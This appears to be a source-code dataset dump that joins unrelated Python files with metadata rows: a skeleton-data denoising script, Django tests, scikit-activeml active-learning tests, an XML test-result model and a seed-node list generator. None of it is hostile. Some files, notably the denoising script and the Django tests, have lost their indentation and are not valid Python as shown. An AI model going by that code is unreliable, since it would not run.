colors[start:end + 1, 1] = actor['colors']
actor2_info += '{}\t{:^8}\t{:f}\n'.format(bodyID, str([start, end]), actor['motion'])
# Update the interval of actor2
start2 = min(start, start2)
end2 = max(end, end2)
del bodies_data[0]
bodies_info += ('\n' + actor1_info + '\n' + actor2_info)
with open(osp.join(actors_info_dir, ske_name + '.txt'), 'w') as fw:
fw.write(bodies_info + '\n')
return joints, colors
def get_raw_denoised_data():
"""
Get denoised data (joints positions and color locations) from raw skeleton sequences.
For each frame of a skeleton sequence, an actor's 3D positions of 25 joints represented
by an 2D array (shape: 25 x 3) is reshaped into a 75-dim vector by concatenating each
3-dim (x, y, z) coordinates along the row dimension in joint order. Each frame contains
two actor's joints positions constituting a 150-dim vector. If there is only one actor,
then the last 75 values are filled with zeros. Otherwise, select the main actor and the
second actor based on the motion amount. Each 150-dim vector as a row vector is put into
a 2D numpy array where the number of rows equals the number of valid frames. All such
2D arrays are put into a list and finally the list is serialized into a cPickle file.
For the skeleton sequence which contains two or more actors (mostly corresponds to the
last 11 classes), the filename and actors' information are recorded into log files.
For better understanding, also generate RGB+skeleton videos for visualization.
"""
with open(raw_data_file, 'rb') as fr: # load raw skeletons data
raw_skes_data = pickle.load(fr)
num_skes = len(raw_skes_data)
print('Found %d available skeleton sequences.' % num_skes)
raw_denoised_joints = []
raw_denoised_colors = []
frames_cnt = []
for (idx, bodies_data) in enumerate(raw_skes_data):
ske_name = bodies_data['name']
print('Processing %s' % ske_name)
num_bodies = len(bodies_data['data'])
if num_bodies == 1: # only 1 actor
num_frames = bodies_data['num_frames']
body_data = list(bodies_data['data'].values())[0]
joints, colors = get_one_actor_points(body_data, num_frames)
else: # more than 1 actor, select two main actors
joints, colors = get_two_actors_points(bodies_data)
# Remove missing frames
joints, colors = remove_missing_frames(ske_name, joints, colors)
num_frames = joints.shape[0] # Update
# Visualize selected actors' skeletons on RGB videos.
raw_denoised_joints.append(joints)
raw_denoised_colors.append(colors)
frames_cnt.append(num_frames)
if (idx + 1) % 1000 == 0:
print('Processed: %.2f%% (%d / %d), ' % \
(100.0 * (idx + 1) / num_skes, idx + 1, num_skes) + \
'Missing count: %d' % missing_count)
raw_skes_joints_pkl = osp.join(save_path, 'raw_denoised_joints.pkl')
with open(raw_skes_joints_pkl, 'wb') as f:
pickle.dump(raw_denoised_joints, f, pickle.HIGHEST_PROTOCOL)
raw_skes_colors_pkl = osp.join(save_path, 'raw_denoised_colors.pkl')
with open(raw_skes_colors_pkl, 'wb') as f:
pickle.dump(raw_denoised_colors, f, pickle.HIGHEST_PROTOCOL)
    frames_cnt = np.array(frames_cnt, dtype=int)  # np.int was removed in NumPy 1.24
np.savetxt(osp.join(save_path, 'frames_cnt.txt'), frames_cnt, fmt='%d')
print('Saved raw denoised positions of {} frames into {}'.format(np.sum(frames_cnt),
raw_skes_joints_pkl))
print('Found %d files that have missing data' % missing_count)
if __name__ == '__main__':
get_raw_denoised_data()
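# Output note (paths as defined above): after a run, the denoised joints can be
# reloaded for downstream feature building, e.g.
#   with open('./denoised_data/raw_denoised_joints.pkl', 'rb') as f:
#       joints_list = pickle.load(f)  # one (num_valid_frames, 75 or 150) array per sequence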
| 42.242009
| 101
| 0.649822
| true
| true
|
1c4475fc251df59a1ea19899348e75bfc2eaad85
| 2,340
|
py
|
Python
|
pythonclubproject/club/tests.py
|
elb-dev/ITC-172
|
df7acdad309c44cfd3b7580132d28d2d7b9713c4
|
[
"Apache-2.0"
] | null | null | null |
pythonclubproject/club/tests.py
|
elb-dev/ITC-172
|
df7acdad309c44cfd3b7580132d28d2d7b9713c4
|
[
"Apache-2.0"
] | null | null | null |
pythonclubproject/club/tests.py
|
elb-dev/ITC-172
|
df7acdad309c44cfd3b7580132d28d2d7b9713c4
|
[
"Apache-2.0"
] | null | null | null |
from django.test import TestCase
from .models import Meeting, MeetingMinutes, Resource, Event
from django.urls import reverse
# Create your tests here.
class MeetingTest(TestCase):
def test_stringOutput(self):
meeting = Meeting(meetingtitle = 'Test Meeting Title')
self.assertEqual(str(meeting), meeting.meetingtitle)
def test_tablename(self):
self.assertEqual(str(Meeting._meta.db_table), 'meeting')
class ResourceTest(TestCase):
def test_stringOutput(self):
resource = Resource(resourcename = 'Tutorial Website')
self.assertEqual(str(resource), resource.resourcename)
def test_tablename(self):
self.assertEqual(str(Resource._meta.db_table), 'resource')
class EventTest(TestCase):
def test_stringOutput(self):
event = Event(eventtitle = 'Test Event Title')
self.assertEqual(str(event), event.eventtitle)
def test_tablename(self):
self.assertEqual(str(Event._meta.db_table), 'event')
class MinutesTest(TestCase):
    # Disabled: MeetingMinutes stores minutestime as a number, so comparing
    # str(minutes) against the raw field needs an explicit str() coercion:
    # def test_stringOutput(self):
    #     minutes = MeetingMinutes(minutestime=10)
    #     self.assertEqual(str(minutes), str(minutes.minutestime))
def test_tablename(self):
self.assertEqual(str(MeetingMinutes._meta.db_table), 'minutes')
# Testing the views
class TestIndex(TestCase):
def test_view_url_accessible_by_name(self):
response = self.client.get(reverse('index'))
self.assertEqual(response.status_code, 200)
def test_view_uses_correct_template(self):
response = self.client.get(reverse('index'))
self.assertTemplateUsed(response, 'club/index.html')
class TestGetMeetings(TestCase):
def test_view_url_accessible_by_name(self):
response = self.client.get(reverse('getmeetings'))
self.assertEqual(response.status_code, 200)
def test_view_uses_correct_template(self):
response = self.client.get(reverse('getmeetings'))
self.assertTemplateUsed(response, 'club/meetings.html')
class TestResources(TestCase):
def test_view_url_accessible_by_name(self):
response = self.client.get(reverse('resources'))
self.assertEqual(response.status_code, 200)
def test_view_uses_correct_template(self):
response = self.client.get(reverse('resources'))
self.assertTemplateUsed(response, 'club/resources.html')
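# Usage note (assuming a standard Django project layout with this app
# installed): run the suite from the project root with
#   python manage.py test club
# The view tests above rely on the URL names 'index', 'getmeetings' and
# 'resources' being registered in the project's URLconf.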
| 41.052632
| 71
| 0.723077
| true
| true
|
1c44766d9a91f957d9c525b9dbed78e8c36349e9
| 4,029
|
py
|
Python
|
skactiveml/pool/tests/test_discriminative_al.py
|
LukasLuehrs/scikit-activeml
|
04d7107272ef0438070808475599131d8726f547
|
[
"BSD-3-Clause"
] | null | null | null |
skactiveml/pool/tests/test_discriminative_al.py
|
LukasLuehrs/scikit-activeml
|
04d7107272ef0438070808475599131d8726f547
|
[
"BSD-3-Clause"
] | null | null | null |
skactiveml/pool/tests/test_discriminative_al.py
|
LukasLuehrs/scikit-activeml
|
04d7107272ef0438070808475599131d8726f547
|
[
"BSD-3-Clause"
] | null | null | null |
import unittest
import numpy as np
from sklearn.datasets import load_breast_cancer
from sklearn.gaussian_process import GaussianProcessClassifier
from sklearn.preprocessing import StandardScaler
from skactiveml.classifier import ParzenWindowClassifier
from skactiveml.pool import DiscriminativeAL
class TestDiscriminativeAL(unittest.TestCase):
def setUp(self):
self.random_state = 1
self.X, self.y = load_breast_cancer(return_X_y=True)
self.y_unlblb = np.full_like(self.y, -1)
self.X = StandardScaler().fit_transform(self.X)
self.discriminator = ParzenWindowClassifier(
random_state=self.random_state
)
def test_init_param_greedy_selection(self):
for greedy_selection in [0, "test", None]:
dal = DiscriminativeAL(
greedy_selection=greedy_selection, missing_label=-1
)
self.assertRaises(
TypeError,
dal.query,
X=self.X,
y=self.y_unlblb,
discriminator=self.discriminator,
)
def test_query_param_discriminator(self):
dal = DiscriminativeAL(missing_label=-1)
for discriminator in [None, GaussianProcessClassifier(), "test"]:
self.assertRaises(
TypeError,
dal.query,
X=self.X,
y=self.y_unlblb,
discriminator=discriminator,
)
def test_query(self):
for greedy_selection in [False, True]:
dal = DiscriminativeAL(
missing_label=-1,
random_state=self.random_state,
greedy_selection=greedy_selection,
)
for candidates in [None, np.arange(len(self.X))]:
if candidates is None:
n_candidates = len(self.y_unlblb)
else:
n_candidates = len(candidates)
query_indices = dal.query(
X=self.X,
y=self.y_unlblb,
discriminator=self.discriminator,
candidates=candidates,
)
self.assertEqual(1, len(query_indices))
query_indices, utilities = dal.query(
X=self.X,
y=self.y_unlblb,
discriminator=self.discriminator,
return_utilities=True,
candidates=candidates,
)
self.assertEqual(self.discriminator.classes, None)
self.assertFalse(hasattr(self.discriminator, "classes_"))
self.assertEqual(1, len(query_indices))
np.testing.assert_array_equal(
np.ones((1, n_candidates)), utilities
)
query_indices, utilities = dal.query(
X=self.X,
y=self.y_unlblb,
discriminator=self.discriminator,
candidates=candidates,
return_utilities=True,
batch_size=10,
)
self.assertEqual(10, len(query_indices))
for i in range(10):
self.assertEqual(i, np.sum(np.isnan(utilities[i])))
if greedy_selection:
default_utilities = np.ones(n_candidates)
is_nan = np.isnan(utilities[i])
np.testing.assert_array_equal(
default_utilities[~is_nan], utilities[i, ~is_nan]
)
if not greedy_selection and i < 9:
is_nan = np.isnan(utilities[i + 1])
self.assertRaises(
AssertionError,
np.testing.assert_array_equal,
utilities[i, ~is_nan],
utilities[i + 1, ~is_nan],
)
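# --- Editor's sketch (addition, not part of the original test module): a
# minimal DiscriminativeAL query outside the unittest harness. The data and
# classifier choices below are assumptions mirroring setUp().
if __name__ == "__main__":
    X, y = load_breast_cancer(return_X_y=True)
    X = StandardScaler().fit_transform(X)
    y_unlabeled = np.full_like(y, -1)  # -1 marks unlabeled samples
    qs = DiscriminativeAL(missing_label=-1, random_state=0)
    disc = ParzenWindowClassifier(random_state=0)
    # Ask for the five samples the discriminator deems most "unlabeled-looking".
    query_idx = qs.query(X=X, y=y_unlabeled, discriminator=disc, batch_size=5)
    print("queried indices:", query_idx)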
| 39.116505
| 77
| 0.518739
|
import unittest
import numpy as np
from sklearn.datasets import load_breast_cancer
from sklearn.gaussian_process import GaussianProcessClassifier
from sklearn.preprocessing import StandardScaler
from skactiveml.classifier import ParzenWindowClassifier
from skactiveml.pool import DiscriminativeAL
class TestDiscriminativeAL(unittest.TestCase):
def setUp(self):
self.random_state = 1
self.X, self.y = load_breast_cancer(return_X_y=True)
self.y_unlblb = np.full_like(self.y, -1)
self.X = StandardScaler().fit_transform(self.X)
self.discriminator = ParzenWindowClassifier(
random_state=self.random_state
)
def test_init_param_greedy_selection(self):
for greedy_selection in [0, "test", None]:
dal = DiscriminativeAL(
greedy_selection=greedy_selection, missing_label=-1
)
self.assertRaises(
TypeError,
dal.query,
X=self.X,
y=self.y_unlblb,
discriminator=self.discriminator,
)
def test_query_param_discriminator(self):
dal = DiscriminativeAL(missing_label=-1)
for discriminator in [None, GaussianProcessClassifier(), "test"]:
self.assertRaises(
TypeError,
dal.query,
X=self.X,
y=self.y_unlblb,
discriminator=discriminator,
)
def test_query(self):
for greedy_selection in [False, True]:
dal = DiscriminativeAL(
missing_label=-1,
random_state=self.random_state,
greedy_selection=greedy_selection,
)
for candidates in [None, np.arange(len(self.X))]:
if candidates is None:
n_candidates = len(self.y_unlblb)
else:
n_candidates = len(candidates)
query_indices = dal.query(
X=self.X,
y=self.y_unlblb,
discriminator=self.discriminator,
candidates=candidates,
)
self.assertEqual(1, len(query_indices))
query_indices, utilities = dal.query(
X=self.X,
y=self.y_unlblb,
discriminator=self.discriminator,
return_utilities=True,
candidates=candidates,
)
self.assertEqual(self.discriminator.classes, None)
self.assertFalse(hasattr(self.discriminator, "classes_"))
self.assertEqual(1, len(query_indices))
np.testing.assert_array_equal(
np.ones((1, n_candidates)), utilities
)
query_indices, utilities = dal.query(
X=self.X,
y=self.y_unlblb,
discriminator=self.discriminator,
candidates=candidates,
return_utilities=True,
batch_size=10,
)
self.assertEqual(10, len(query_indices))
for i in range(10):
self.assertEqual(i, np.sum(np.isnan(utilities[i])))
if greedy_selection:
default_utilities = np.ones(n_candidates)
is_nan = np.isnan(utilities[i])
np.testing.assert_array_equal(
default_utilities[~is_nan], utilities[i, ~is_nan]
)
if not greedy_selection and i < 9:
is_nan = np.isnan(utilities[i + 1])
self.assertRaises(
AssertionError,
np.testing.assert_array_equal,
utilities[i, ~is_nan],
utilities[i + 1, ~is_nan],
)
| true
| true
|
1c4476a7a8651046cc68c24e7902545fbb45d44e
| 9,207
|
py
|
Python
|
src/ea/libs/FileModels/TestResult.py
|
dmachard/extensivetesting
|
a5c3d2648aebcfaf1d0352a7aff8728ab843b73f
|
[
"MIT"
] | 9
|
2019-09-01T04:56:28.000Z
|
2021-04-08T19:45:52.000Z
|
src/ea/libs/FileModels/TestResult.py
|
dmachard/extensivetesting
|
a5c3d2648aebcfaf1d0352a7aff8728ab843b73f
|
[
"MIT"
] | 5
|
2020-10-27T15:05:12.000Z
|
2021-12-13T13:48:11.000Z
|
src/ea/libs/FileModels/TestResult.py
|
dmachard/extensivetesting
|
a5c3d2648aebcfaf1d0352a7aff8728ab843b73f
|
[
"MIT"
] | 2
|
2019-10-01T06:12:06.000Z
|
2020-04-29T13:28:20.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# -------------------------------------------------------------------
# Copyright (c) 2010-2021 Denis Machard
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# -------------------------------------------------------------------
"""
Test result module
"""
import sys
import zlib
import base64
import re
from ea.libs import Logger
from ea.libs.PyXmlDict import Dict2Xml as PyDictXml
from ea.libs.PyXmlDict import Xml2Dict as PyXmlDict
# unicode = str with python3
if sys.version_info > (3,):
unicode = str
r = re.compile(
u"[^\x09\x0A\x0D\x20-\x7E\x85\xA0-\xFF\u0100-\uD7FF\uE000-\uFDCF\uFDE0-\uFFFD]")
def removeInvalidXML(string):
def replacer(m):
return b""
return re.sub(r, replacer, string)
def bytes2str(val):
"""
bytes 2 str conversion, only for python3
"""
if isinstance(val, bytes):
return str(val, "utf8")
else:
return val
def keyequals(key, search):
"""
    Check whether key equals search, accepting both bytes and str keys.
"""
ret = False
if isinstance(key, bytes):
if str(key, 'utf8') == search:
ret = True
else:
if key == search:
ret = True
return ret
class DataModel(Logger.ClassLogger):
"""
Data model for test result
"""
def __init__(self, testResult='', testHeader=''):
"""
This class describes the model of the test result document,
        and provides an XML <=> Python encoder.
The following xml :
<?xml version="1.0" encoding="utf-8" ?>
<file>
<properties">
<comments>
<comment>
<author>author</author>
<datetime>...</datetime>
<post>...</post>
</comment>
....
</comments>
</properties>
<testheader>...</testheader>
<testresult>...</testresult>
</file>
"""
self.codecX2D = PyXmlDict.Xml2Dict()
self.codecD2X = PyDictXml.Dict2Xml(coding=None)
self.properties = {'properties': {'comments': {'comment': []}}}
self.testresult = testResult
self.testheader = testHeader
def addComment(self, user_name, user_post, post_timestamp):
"""
Add one comment
"""
try:
comments = self.properties['properties']['comments']
tpl = {
'author': user_name,
'datetime': str(post_timestamp),
'post': user_post}
if isinstance(comments, dict):
if isinstance(comments['comment'], list):
comments['comment'].append(tpl)
else:
comments['comment'] = [comments['comment'], tpl]
else:
comments = {'comment': [tpl]}
except Exception as e:
self.error("[addComment] %s" % str(e))
return None
return comments
def delComments(self):
"""
Delete all comments
"""
self.properties['properties']['comments'] = {'comment': []}
def toXml(self):
"""
Python data to xml
@return:
@rtype:
"""
try:
if sys.version_info > (3,):
self.testresult = bytes(self.testresult, "utf8")
self.testheader = bytes(self.testheader, "utf8")
except Exception as e:
self.error("TestResult > To Xml prepare: %s" % str(e))
return None
xmlDataList = [b'<?xml version="1.0" encoding="utf-8" ?>']
xmlDataList.append(b'<file>')
try:
xmlDataList.append(self.codecD2X.parseDict(dico=self.properties))
except Exception as e:
self.error("TestResult > To Xml test prop: %s" % str(e))
return None
try:
tr = zlib.compress(self.testresult)
tr64 = base64.b64encode(tr)
if sys.version_info > (3,):
tr64 = tr64.decode("utf8")
xmlDataList.append(
b'<testresult><![CDATA[%s]]></testresult>' %
bytes(
tr64, "utf8"))
else:
xmlDataList.append(
b'<testresult><![CDATA[%s]]></testresult>' %
tr64)
except Exception as e:
self.error("TestResult > To Xml test result: %s" % str(e))
return None
try:
hdr = zlib.compress(self.testheader)
hdr64 = base64.b64encode(hdr)
if sys.version_info > (3,):
hdr64 = hdr64.decode("utf8")
xmlDataList.append(
b'<testheader><![CDATA[%s]]></testheader>' %
bytes(
hdr64, "utf8"))
else:
xmlDataList.append(
b'<testheader><![CDATA[%s]]></testheader>' %
hdr64)
except Exception as e:
self.error("TestResult > To Xml test header: %s" % str(e))
return None
xmlDataList.append(b'</file>')
ret = b'\n'.join(xmlDataList)
if sys.version_info > (3,):
ret = ret.decode("utf8")
try:
# remove all invalid xml data
ret = removeInvalidXML(ret)
except Exception as e:
self.error("TestResult > To Xml invalid: %s" % str(e))
return None
return ret
def load(self, absPath=None, rawData=None):
"""
Load data model from a file or from arguments
@param absPath:
@type absPath:
@param rawData:
@type rawData:
"""
self.properties = {}
self.testresult = ''
# open the file
if rawData is None:
try:
f = open(absPath, 'rb')
read_data = f.read()
f.close()
except Exception as e:
self.error(e)
return False
else:
read_data = rawData
# uncompress the file
try:
decompressed_data = zlib.decompress(read_data)
except Exception as e:
self.error("uncompress testresult error: %s" % e)
return False
# convert xml to python objects
try:
ret = self.codecX2D.parseXml(xml=decompressed_data, huge_tree=True)
del decompressed_data
del read_data
except Exception as e:
self.error("parse xml error: %s" % str(e))
return False
# decode testresult key
try:
tr_decoded = base64.b64decode(ret['file']['testresult'])
tr_decompressed = zlib.decompress(tr_decoded)
if sys.version_info > (3,): # python3 support
self.testresult = bytes2str(tr_decompressed)
else:
self.testresult = tr_decompressed
del tr_decoded
except Exception as e:
self.error("read testresult error: %s" % str(e))
return False
# decode the testheader key
try:
if 'testheader' not in ret['file']: # for backward compatibility
ret['file']['testheader'] = ''
else:
hdr_decoded = base64.b64decode(ret['file']['testheader'])
hdr_decompressed = zlib.decompress(hdr_decoded)
if sys.version_info > (3,): # python3 support
self.testheader = bytes2str(hdr_decompressed)
else:
self.testheader = hdr_decompressed
except Exception as e:
self.error("read test result header error: %s" % str(e))
return False
# finally extract properties key
try:
properties = ret['file']['properties']
self.properties = {'properties': properties}
except Exception as e:
self.error("prepare test result properties error: %s" % str(e))
return False
return True
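# --- Editor's sketch (addition, not part of the original module): a hedged
# round-trip with DataModel. The payload strings are hypothetical; load()
# expects the zlib-compressed XML that toXml() produces.
def _example_roundtrip():
    dm = DataModel(testResult='<tr/>', testHeader='<th/>')
    dm.addComment('editor', 'example post', '2021-01-01 00:00:00')
    xml = dm.toXml()  # str on Python 3, or None on error
    if xml is None:
        return None
    dm_loaded = DataModel()
    dm_loaded.load(rawData=zlib.compress(xml.encode('utf8')))
    return dm_loaded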
| 31.530822
| 84
| 0.528185
|
import sys
import zlib
import base64
import re
from ea.libs import Logger
from ea.libs.PyXmlDict import Dict2Xml as PyDictXml
from ea.libs.PyXmlDict import Xml2Dict as PyXmlDict
if sys.version_info > (3,):
unicode = str
r = re.compile(
u"[^\x09\x0A\x0D\x20-\x7E\x85\xA0-\xFF\u0100-\uD7FF\uE000-\uFDCF\uFDE0-\uFFFD]")
def removeInvalidXML(string):
def replacer(m):
return b""
return re.sub(r, replacer, string)
def bytes2str(val):
if isinstance(val, bytes):
return str(val, "utf8")
else:
return val
def keyequals(key, search):
ret = False
if isinstance(key, bytes):
if str(key, 'utf8') == search:
ret = True
else:
if key == search:
ret = True
return ret
class DataModel(Logger.ClassLogger):
def __init__(self, testResult='', testHeader=''):
self.codecX2D = PyXmlDict.Xml2Dict()
self.codecD2X = PyDictXml.Dict2Xml(coding=None)
self.properties = {'properties': {'comments': {'comment': []}}}
self.testresult = testResult
self.testheader = testHeader
def addComment(self, user_name, user_post, post_timestamp):
try:
comments = self.properties['properties']['comments']
tpl = {
'author': user_name,
'datetime': str(post_timestamp),
'post': user_post}
if isinstance(comments, dict):
if isinstance(comments['comment'], list):
comments['comment'].append(tpl)
else:
comments['comment'] = [comments['comment'], tpl]
else:
comments = {'comment': [tpl]}
except Exception as e:
self.error("[addComment] %s" % str(e))
return None
return comments
def delComments(self):
self.properties['properties']['comments'] = {'comment': []}
def toXml(self):
try:
if sys.version_info > (3,):
self.testresult = bytes(self.testresult, "utf8")
self.testheader = bytes(self.testheader, "utf8")
except Exception as e:
self.error("TestResult > To Xml prepare: %s" % str(e))
return None
xmlDataList = [b'<?xml version="1.0" encoding="utf-8" ?>']
xmlDataList.append(b'<file>')
try:
xmlDataList.append(self.codecD2X.parseDict(dico=self.properties))
except Exception as e:
self.error("TestResult > To Xml test prop: %s" % str(e))
return None
try:
tr = zlib.compress(self.testresult)
tr64 = base64.b64encode(tr)
if sys.version_info > (3,):
tr64 = tr64.decode("utf8")
xmlDataList.append(
b'<testresult><![CDATA[%s]]></testresult>' %
bytes(
tr64, "utf8"))
else:
xmlDataList.append(
b'<testresult><![CDATA[%s]]></testresult>' %
tr64)
except Exception as e:
self.error("TestResult > To Xml test result: %s" % str(e))
return None
try:
hdr = zlib.compress(self.testheader)
hdr64 = base64.b64encode(hdr)
if sys.version_info > (3,):
hdr64 = hdr64.decode("utf8")
xmlDataList.append(
b'<testheader><![CDATA[%s]]></testheader>' %
bytes(
hdr64, "utf8"))
else:
xmlDataList.append(
b'<testheader><![CDATA[%s]]></testheader>' %
hdr64)
except Exception as e:
self.error("TestResult > To Xml test header: %s" % str(e))
return None
xmlDataList.append(b'</file>')
ret = b'\n'.join(xmlDataList)
if sys.version_info > (3,):
ret = ret.decode("utf8")
try:
ret = removeInvalidXML(ret)
except Exception as e:
self.error("TestResult > To Xml invalid: %s" % str(e))
return None
return ret
def load(self, absPath=None, rawData=None):
self.properties = {}
self.testresult = ''
if rawData is None:
try:
f = open(absPath, 'rb')
read_data = f.read()
f.close()
except Exception as e:
self.error(e)
return False
else:
read_data = rawData
try:
decompressed_data = zlib.decompress(read_data)
except Exception as e:
self.error("uncompress testresult error: %s" % e)
return False
try:
ret = self.codecX2D.parseXml(xml=decompressed_data, huge_tree=True)
del decompressed_data
del read_data
except Exception as e:
self.error("parse xml error: %s" % str(e))
return False
try:
tr_decoded = base64.b64decode(ret['file']['testresult'])
tr_decompressed = zlib.decompress(tr_decoded)
if sys.version_info > (3,):
self.testresult = bytes2str(tr_decompressed)
else:
self.testresult = tr_decompressed
del tr_decoded
except Exception as e:
self.error("read testresult error: %s" % str(e))
return False
try:
if 'testheader' not in ret['file']:
ret['file']['testheader'] = ''
else:
hdr_decoded = base64.b64decode(ret['file']['testheader'])
hdr_decompressed = zlib.decompress(hdr_decoded)
if sys.version_info > (3,):
self.testheader = bytes2str(hdr_decompressed)
else:
self.testheader = hdr_decompressed
except Exception as e:
self.error("read test result header error: %s" % str(e))
return False
try:
properties = ret['file']['properties']
self.properties = {'properties': properties}
except Exception as e:
self.error("prepare test result properties error: %s" % str(e))
return False
return True
| true
| true
|
1c4477483962ec1dcb79e2cdf6424d5181cb6433
| 5,514
|
py
|
Python
|
contrib/seeds/makeseeds.py
|
masternodecoin/Masternodecoin-NEW
|
2c1e745dc371268af8b21a9b1b1ef99f1e31f059
|
[
"MIT"
] | null | null | null |
contrib/seeds/makeseeds.py
|
masternodecoin/Masternodecoin-NEW
|
2c1e745dc371268af8b21a9b1b1ef99f1e31f059
|
[
"MIT"
] | null | null | null |
contrib/seeds/makeseeds.py
|
masternodecoin/Masternodecoin-NEW
|
2c1e745dc371268af8b21a9b1b1ef99f1e31f059
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# Copyright (c) 2013-2017 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
# Generate seeds.txt from Pieter's DNS seeder
#
NSEEDS=512
MAX_SEEDS_PER_ASN=2
MIN_BLOCKS = 615801
# These are hosts that have been observed to be behaving strangely (e.g.
# aggressively connecting to every node).
SUSPICIOUS_HOSTS = {
""
}
import re
import sys
import dns.resolver
import collections
PATTERN_IPV4 = re.compile(r"^((\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})):(\d+)$")
PATTERN_IPV6 = re.compile(r"^\[([0-9a-z:]+)\]:(\d+)$")
PATTERN_ONION = re.compile(r"^([abcdefghijklmnopqrstuvwxyz234567]{16}\.onion):(\d+)$")
PATTERN_AGENT = re.compile(r"^(/MTNCCore:2.2.(0|1|99)/)$")
def parseline(line):
sline = line.split()
if len(sline) < 11:
return None
m = PATTERN_IPV4.match(sline[0])
sortkey = None
ip = None
if m is None:
m = PATTERN_IPV6.match(sline[0])
if m is None:
m = PATTERN_ONION.match(sline[0])
if m is None:
return None
else:
net = 'onion'
ipstr = sortkey = m.group(1)
port = int(m.group(2))
else:
net = 'ipv6'
if m.group(1) in ['::']: # Not interested in localhost
return None
ipstr = m.group(1)
sortkey = ipstr # XXX parse IPv6 into number, could use name_to_ipv6 from generate-seeds
port = int(m.group(2))
else:
# Do IPv4 sanity check
ip = 0
for i in range(0,4):
if int(m.group(i+2)) < 0 or int(m.group(i+2)) > 255:
return None
ip = ip + (int(m.group(i+2)) << (8*(3-i)))
if ip == 0:
return None
net = 'ipv4'
sortkey = ip
ipstr = m.group(1)
port = int(m.group(6))
# Skip bad results.
    if int(sline[1]) == 0:  # fields are strings; compare numerically
return None
# Extract uptime %.
uptime30 = float(sline[7][:-1])
# Extract Unix timestamp of last success.
lastsuccess = int(sline[2])
# Extract protocol version.
version = int(sline[10])
# Extract user agent.
if len(sline) > 11:
agent = sline[11][1:] + sline[12][:-1]
else:
agent = sline[11][1:-1]
# Extract service flags.
service = int(sline[9], 16)
# Extract blocks.
blocks = int(sline[8])
# Construct result.
return {
'net': net,
'ip': ipstr,
'port': port,
'ipnum': ip,
'uptime': uptime30,
'lastsuccess': lastsuccess,
'version': version,
'agent': agent,
'service': service,
'blocks': blocks,
'sortkey': sortkey,
}
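# --- Editor's sketch (addition, not part of the original script): feeding
# parseline() one hypothetical seeder line. The column layout is an assumption
# inferred from the indices read above (address, good, last success, uptime
# percentages, blocks, services, version, quoted user agent).
def _example_parseline():
    sample = ('203.0.113.5:17771 1 1614000000 100.00% 100.00% 100.00% '
              '100.00% 97.50% 620000 0000000d 70208 "/MTNCCore:2.2.0 (x)/"')
    return parseline(sample)  # -> dict with net='ipv4', uptime=97.5, ...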
def filtermultiport(ips):
    '''Filter out hosts with more than one node per IP'''
hist = collections.defaultdict(list)
for ip in ips:
hist[ip['sortkey']].append(ip)
return [value[0] for (key,value) in list(hist.items()) if len(value)==1]
# Based on Greg Maxwell's seed_filter.py
def filterbyasn(ips, max_per_asn, max_total):
# Sift out ips by type
ips_ipv4 = [ip for ip in ips if ip['net'] == 'ipv4']
ips_ipv6 = [ip for ip in ips if ip['net'] == 'ipv6']
ips_onion = [ip for ip in ips if ip['net'] == 'onion']
# Filter IPv4 by ASN
result = []
asn_count = {}
for ip in ips_ipv4:
if len(result) == max_total:
break
try:
asn = int([x.to_text() for x in dns.resolver.query('.'.join(reversed(ip['ip'].split('.'))) + '.origin.asn.cymru.com', 'TXT').response.answer][0].split('\"')[1].split(' ')[0])
if asn not in asn_count:
asn_count[asn] = 0
if asn_count[asn] == max_per_asn:
continue
asn_count[asn] += 1
result.append(ip)
except:
sys.stderr.write('ERR: Could not resolve ASN for "' + ip['ip'] + '"\n')
# TODO: filter IPv6 by ASN
# Add back non-IPv4
result.extend(ips_ipv6)
result.extend(ips_onion)
return result
def main():
lines = sys.stdin.readlines()
ips = [parseline(line) for line in lines]
    # Skip entries with an invalid address.
ips = [ip for ip in ips if ip is not None]
# Skip entries from suspicious hosts.
ips = [ip for ip in ips if ip['ip'] not in SUSPICIOUS_HOSTS]
# Enforce minimal number of blocks.
ips = [ip for ip in ips if ip['blocks'] >= MIN_BLOCKS]
# Require service bit 1.
ips = [ip for ip in ips if (ip['service'] & 1) == 1]
# Require at least 50% 30-day uptime.
ips = [ip for ip in ips if ip['uptime'] > 50]
# Require a known and recent user agent.
ips = [ip for ip in ips if PATTERN_AGENT.match(re.sub(' ', '-', ip['agent']))]
# Sort by availability (and use last success as tie breaker)
ips.sort(key=lambda x: (x['uptime'], x['lastsuccess'], x['ip']), reverse=True)
    # Filter out hosts with multiple bitcoin ports; these are likely abusive
ips = filtermultiport(ips)
# Look up ASNs and limit results, both per ASN and globally.
ips = filterbyasn(ips, MAX_SEEDS_PER_ASN, NSEEDS)
# Sort the results by IP address (for deterministic output).
ips.sort(key=lambda x: (x['net'], x['sortkey']))
for ip in ips:
if ip['net'] == 'ipv6':
print('[%s]:%i' % (ip['ip'], ip['port']))
else:
print('%s:%i' % (ip['ip'], ip['port']))
if __name__ == '__main__':
main()
| 32.05814
| 186
| 0.566921
|
#
NSEEDS=512
MAX_SEEDS_PER_ASN=2
MIN_BLOCKS = 615801
# These are hosts that have been observed to be behaving strangely (e.g.
# aggressively connecting to every node).
SUSPICIOUS_HOSTS = {
""
}
import re
import sys
import dns.resolver
import collections
PATTERN_IPV4 = re.compile(r"^((\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})):(\d+)$")
